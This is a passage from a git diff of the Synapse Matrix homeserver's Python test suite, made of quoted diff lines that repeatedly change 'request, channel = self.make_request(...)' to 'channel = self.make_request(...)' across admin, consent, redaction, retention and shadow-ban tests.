"@@ -349,3 +349,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -354,3 +354,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", \"/profile/@bob2:test/displayname\")", - "+ channel = self.make_request(\"GET\", \"/profile/@bob2:test/displayname\")", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -359,3 +359,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " # displayname is empty", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -375,3 +375,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -380,3 +380,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", \"/profile/@bob3:test/displayname\")", - "+ channel = self.make_request(\"GET\", \"/profile/@bob3:test/displayname\")", - " self.assertEqual(404, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -384,3 +384,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " # set displayname", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -400,3 +400,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -405,3 +405,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", \"/profile/@bob4:test/displayname\")", - "+ channel = self.make_request(\"GET\", \"/profile/@bob4:test/displayname\")", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -431,3 +431,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " # Register new user with admin API", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -450,3 +450,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -475,3 +475,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -484,3 +484,3 @@ class UsersListTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -522,5 +522,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.other_user_token,)", - "@@ -529,3 +527,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url, access_token=self.other_user_token, content=b\"{}\",", - "@@ -541,3 +539,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -567,3 +565,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -583,5 +581,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -614,3 +610,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -630,5 +626,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -658,5 +652,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # before limit of monthly active users is reached", - "- request, channel = self.make_request(", - "- \"GET\", \"/sync\", access_token=self.admin_user_tok", - "- )", - "+ channel = self.make_request(\"GET\", \"/sync\", access_token=self.admin_user_tok)", - "@@ -683,3 +675,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -722,3 +714,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -759,3 +751,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -803,3 +795,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -829,3 +821,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -846,3 +838,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -858,3 +850,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", - "@@ -876,3 +868,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -889,3 +881,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", - "@@ -906,3 +898,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -919,3 +911,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", - "@@ -933,3 +925,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Deactivate the user.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -946,3 +938,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Attempt to reactivate the user (without a password).", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -955,3 +947,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Reactivate the user.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -966,3 +958,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", - "@@ -983,3 +975,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -995,3 +987,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", - "@@ -1013,3 +1005,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -1025,5 +1017,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1037,3 +1027,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -1047,5 +1037,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " # Check user is not deactivated", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1091,3 +1079,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -1102,5 +1090,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", - "@@ -1114,5 +1100,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/users/@unknown_person:test/joined_rooms\"", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1127,5 +1111,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1140,5 +1122,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", - " # Get rooms", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -1159,5 +1139,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", - " # Get rooms", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -1190,3 +1168,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -1201,5 +1179,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", - "@@ -1213,5 +1189,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/users/@unknown_person:test/pushers\"", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1226,5 +1200,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1239,5 +1211,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", - " # Get pushers", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -1268,5 +1238,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", - " # Get pushers", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -1309,3 +1277,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -1320,5 +1288,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", - "@@ -1332,5 +1298,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/users/@unknown_person:test/media\"", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1345,5 +1309,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", - "@@ -1361,3 +1323,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=5\", access_token=self.admin_user_tok,", - "@@ -1380,3 +1342,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=5\", access_token=self.admin_user_tok,", - "@@ -1399,3 +1361,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=5&limit=10\", access_token=self.admin_user_tok,", - "@@ -1414,3 +1376,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=-5\", access_token=self.admin_user_tok,", - "@@ -1426,3 +1388,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=-5\", access_token=self.admin_user_tok,", - "@@ -1444,3 +1406,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - " # Number of results is the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=20\", access_token=self.admin_user_tok,", - "@@ -1455,3 +1417,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - " # Number of max results is larger than the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=21\", access_token=self.admin_user_tok,", - "@@ -1466,3 +1428,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - " # Number of max results is smaller than the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=19\", access_token=self.admin_user_tok,", - "@@ -1478,3 +1440,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - " # `next_token` does not appear", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=19\", access_token=self.admin_user_tok,", - "@@ -1493,5 +1455,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -1510,5 +1470,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -1578,3 +1536,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " def _get_token(self) -> str:", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", self.url, b\"{}\", access_token=self.admin_user_tok", - "@@ -1587,3 +1545,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", - "@@ -1595,3 +1553,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", self.url, b\"{}\", access_token=self.other_user_tok", - "@@ -1623,3 +1581,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Check that we don't see a new device in our devices list", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", - "@@ -1638,5 +1596,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Test that we can successfully make a request", - "- request, channel = self.make_request(", - "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1644,5 +1600,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Logout with the puppet token", - "- request, channel = self.make_request(", - "- \"POST\", \"logout\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"POST\", \"logout\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1650,5 +1604,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # The puppet token should no longer work", - "- request, channel = self.make_request(", - "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1656,3 +1608,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # .. but the real user's tokens should still work", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", - "@@ -1669,5 +1621,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Test that we can successfully make a request", - "- request, channel = self.make_request(", - "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1675,3 +1625,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Logout all with the real user token", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"logout/all\", b\"{}\", access_token=self.other_user_tok", - "@@ -1681,5 +1631,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # The puppet token should still work", - "- request, channel = self.make_request(", - "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1687,3 +1635,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # .. but the real user's tokens shouldn't", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", - "@@ -1700,5 +1648,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Test that we can successfully make a request", - "- request, channel = self.make_request(", - "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1706,3 +1652,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # Logout all with the admin user token", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"logout/all\", b\"{}\", access_token=self.admin_user_tok", - "@@ -1712,5 +1658,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # The puppet token should no longer work", - "- request, channel = self.make_request(", - "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", - "- )", - "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", - " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1718,3 +1662,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", - " # .. but the real user's tokens should still work", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", - "@@ -1800,3 +1744,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url1, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url1, b\"{}\")", - " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1804,3 +1748,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", self.url2, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url2, b\"{}\")", - " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1815,5 +1759,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url1, access_token=other_user2_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url1, access_token=other_user2_token,)", - " self.assertEqual(403, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1821,5 +1763,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url2, access_token=other_user2_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url2, access_token=other_user2_token,)", - " self.assertEqual(403, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -1834,5 +1774,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url1, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url1, access_token=self.admin_user_tok,)", - " self.assertEqual(400, channel.code, msg=channel.json_body)", - "@@ -1840,5 +1778,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", url2, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", url2, access_token=self.admin_user_tok,)", - " self.assertEqual(400, channel.code, msg=channel.json_body)", - "@@ -1850,5 +1786,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "- \"GET\", self.url1, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url1, access_token=self.admin_user_tok,)", - " self.assertEqual(200, channel.code, msg=channel.json_body)", - "@@ -1857,5 +1791,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url2, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url2, access_token=self.admin_user_tok,)", - " self.assertEqual(200, channel.code, msg=channel.json_body)", - "@@ -1870,5 +1802,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url1, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url1, access_token=other_user_token,)", - " self.assertEqual(200, channel.code, msg=channel.json_body)", - "@@ -1877,5 +1807,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url2, access_token=other_user_token,", - "- )", - "+ channel = self.make_request(\"GET\", self.url2, access_token=other_user_token,)", - " self.assertEqual(200, channel.code, msg=channel.json_body)", - "diff --git a/tests/rest/client/test_consent.py b/tests/rest/client/test_consent.py", - "index e2e6a5e16..c74693e9b 100644", - "--- a/tests/rest/client/test_consent.py", - "+++ b/tests/rest/client/test_consent.py", - "@@ -63,3 +63,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", - " resource = consent_resource.ConsentResource(self.hs)", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor, FakeSite(resource), \"GET\", \"/consent?v=1\", shorthand=False", - "@@ -84,3 +84,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -99,3 +99,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", - " # POST to the consent page, saying we've agreed", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -111,3 +111,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", - " # changed", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "diff --git a/tests/rest/client/test_ephemeral_message.py b/tests/rest/client/test_ephemeral_message.py", - "index a1ccc4ee9..56937dcd2 100644", - "--- a/tests/rest/client/test_ephemeral_message.py", - "+++ b/tests/rest/client/test_ephemeral_message.py", - "@@ -95,3 +95,3 @@ class EphemeralMessageTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", url)", - "+ channel = self.make_request(\"GET\", url)", - "diff --git a/tests/rest/client/test_identity.py b/tests/rest/client/test_identity.py", - "index 259c6a198..c0a9fc692 100644", - "--- a/tests/rest/client/test_identity.py", - "+++ b/tests/rest/client/test_identity.py", - "@@ -45,5 +45,3 @@ class IdentityTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- b\"POST\", \"/createRoom\", b\"{}\", access_token=tok", - "- )", - "+ channel = self.make_request(b\"POST\", \"/createRoom\", b\"{}\", access_token=tok)", - " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", - "@@ -58,3 +56,3 @@ class IdentityTestCase(unittest.HomeserverTestCase):", - " request_url = (\"/rooms/%s/invite\" % (room_id)).encode(\"ascii\")", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " b\"POST\", request_url, request_data, access_token=tok", - "diff --git a/tests/rest/client/test_redactions.py b/tests/rest/client/test_redactions.py", - "index c1f516cc9..f0707646b 100644", - "--- a/tests/rest/client/test_redactions.py", - "+++ b/tests/rest/client/test_redactions.py", - "@@ -71,5 +71,3 @@ class RedactionsTestCase(HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"POST\", path, content={}, access_token=access_token", - "- )", - "+ channel = self.make_request(\"POST\", path, content={}, access_token=access_token)", - " self.assertEqual(int(channel.result[\"code\"]), expect_code)", - "@@ -78,5 +76,3 @@ class RedactionsTestCase(HomeserverTestCase):", - " def _sync_room_timeline(self, access_token, room_id):", - "- request, channel = self.make_request(", - "- \"GET\", \"sync\", access_token=self.mod_access_token", - "- )", - "+ channel = self.make_request(\"GET\", \"sync\", access_token=self.mod_access_token)", - " self.assertEqual(channel.result[\"code\"], b\"200\")", - "diff --git a/tests/rest/client/test_retention.py b/tests/rest/client/test_retention.py", - "index f56b5d923..31dc832fd 100644", - "--- a/tests/rest/client/test_retention.py", - "+++ b/tests/rest/client/test_retention.py", - "@@ -327,3 +327,3 @@ class RetentionNoDefaultPolicyTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", url, access_token=self.token)", - "+ channel = self.make_request(\"GET\", url, access_token=self.token)", - "diff --git a/tests/rest/client/test_shadow_banned.py b/tests/rest/client/test_shadow_banned.py", - "index 94dcfb9f7..e689c3fbe 100644", - "--- a/tests/rest/client/test_shadow_banned.py", - "+++ b/tests/rest/client/test_shadow_banned.py", - "@@ -91,3 +91,3 @@ class RoomTestCase(_ShadowBannedBase):", - " # Inviting the user completes successfully.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -105,3 +105,3 @@ class RoomTestCase(_ShadowBannedBase):", - " # The room creation is successful.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -160,3 +160,3 @@ class RoomTestCase(_ShadowBannedBase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -185,3 +185,3 @@ class RoomTestCase(_ShadowBannedBase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -200,3 +200,3 @@ class RoomTestCase(_ShadowBannedBase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -246,3 +246,3 @@ class ProfileTestCase(_ShadowBannedBase):", - " # The update should succeed.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -256,3 +256,3 @@ class ProfileTestCase(_ShadowBannedBase):", - " # The user's display name should be updated.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/profile/%s/displayname\" % (self.banned_user_id,)", - "@@ -284,3 +284,3 @@ class ProfileTestCase(_ShadowBannedBase):", - " # The update should succeed.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "diff --git a/tests/rest/client/test_third_party_rules.py b/tests/rest/client/test_third_party_rules.py", - "index 0e96697f9..227fffab5 100644", - "--- a/tests/rest/client/test_third_party_rules.py", - "+++ b/tests/rest/client/test_third_party_rules.py", - "@@ -88,3 +88,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " 